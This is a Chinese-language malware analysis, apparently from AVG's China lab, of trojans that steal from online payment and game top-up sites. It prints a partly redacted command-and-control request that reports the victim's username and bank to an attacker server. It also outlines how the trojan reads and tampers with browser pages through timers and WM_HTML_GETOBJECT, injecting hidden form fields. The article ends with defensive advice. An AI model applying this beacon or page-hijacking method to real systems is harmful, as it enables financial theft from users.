歲末將至,一年一度的促銷狂潮也陸續到來,各大網購網站施展渾身解數來吸引客戶。據最新資料顯示:僅國內著名的網購平臺淘寶在12月12日推出的全民瘋搶活動,一個小時內,成交額就達到了4.75億,成交量278萬筆。令人眼花繚亂的促銷手段吸引來的不僅是諸多的網購達人,更吸引了眾多駭客的目光。在最近一段時間內,AVG中國病毒實驗室截獲大量針對國內各種支付平臺的病毒,包括:百聯,盛付通,快錢,訊付,易寶,支付寶等。同時針對的範圍也有所擴大,除了網購網站之外,一些遊戲公司的充值網站也在此類木馬的攻擊範圍之列,如:完美,多玩,4399網路遊戲,征途遊戲等。此類木馬大多是由某種生成器生成,並且木馬的作者提供後臺的管理系統。
此類病毒的傳播手段沒有很明顯的變化,大多還是利用社會工程學偽裝成word文件,圖片檔案,或者文字檔案,誘導使用者點選。對於攻擊的手段主要有竊取使用者的支付賬戶的密碼,修改使用者的支付賬戶。下面讓我們來近距離來接觸此類木馬,揭開它的神秘面紗。
目前截獲的一些樣本中大多數具有word文件的圖示。這類檔案可能是以郵件附件的形式存在,也有可能是賣家傳送產品資訊。在執行過程中此類木馬會首先連線到baidu,以確定當前的網路狀況。然後連線到病毒後臺的伺服器。發出的請求的形式如下:
http://119.***.***.48:858/Api/163/Post.Php?UserName=aucodehu&Bank=ICBC&Money=88(連結已經處理)
透過以上使用者名稱以及銀行資訊,可以進行管理和分贓。隨後木馬會簡單的收集一下系統的資訊然後傳送到相同的後臺系統。
包括本機的ip,作業系統版本,以及地理位置。
在進行完以上的準備活動後,此木馬就開始監控使用者的所瀏覽的網址,區別於以往的程式碼注入,或者劫持API之類的手法,此類木馬使用了一種更為簡便而且行之有效的方法:定時器。而這種手段可能被某些主動防禦所忽略。此類木馬一般設定了三個或以上的定時器。觸發的時間間隔是200毫秒。這個時間間隔足以監控到使用者對網站的操作。其中一個定時器,會透過GetCursorPos獲得當前滑鼠的位置,進而獲得當前視窗的控制程式碼。然後透過向Webbrowser控制元件(視窗類名是"Internet Explorer_Server")發一個WM_HTML_GETOBJECT的訊息獲得IHTMLDocument物件。獲得此物件後,木馬作者就可以對該頁面進行任何操作:解析該頁面元素,竊取自己感興趣的任何內容,篡改支付資訊等等,以下是在病毒中擷取到的一個字串的片段:
同時也會在頁面中新增一些屬性為隱藏的標籤,這些標籤是不會顯示在頁面中,但是卻是真正起作用的部分:
一旦點選提交,這些頁面中隱藏的內容將被提交,使用者就會面臨著資訊失竊,財產損失。同時病毒還設定其它的定時器。用來關閉支付網站對使用者環境檢查的以及使用者支付失敗的頁面。
對於此類木馬的防範,應該注意以下幾點:
1. 保持防毒軟體的及時更新。
2. 不開啟任何不是自己主動索取的檔案。
3. 檢查檔案的型別是否和圖示以及字尾一致。
4. 網購時如果發現任何使用者支付環境檢查的頁面被關閉,立即停止支付。
5. 檢查支付頁面是否被修改。
AVG已經可以檢測此類病毒,使用者們只要不關閉更新,保持病毒庫在當前最新狀態,就可以有效阻止該木馬的侵襲。同時,AVG中國實驗室藉此提醒廣大網友,年底是各種網路病毒爆發的高危期,平時網上衝浪特別是涉及財產交易時一定要謹慎再謹慎。
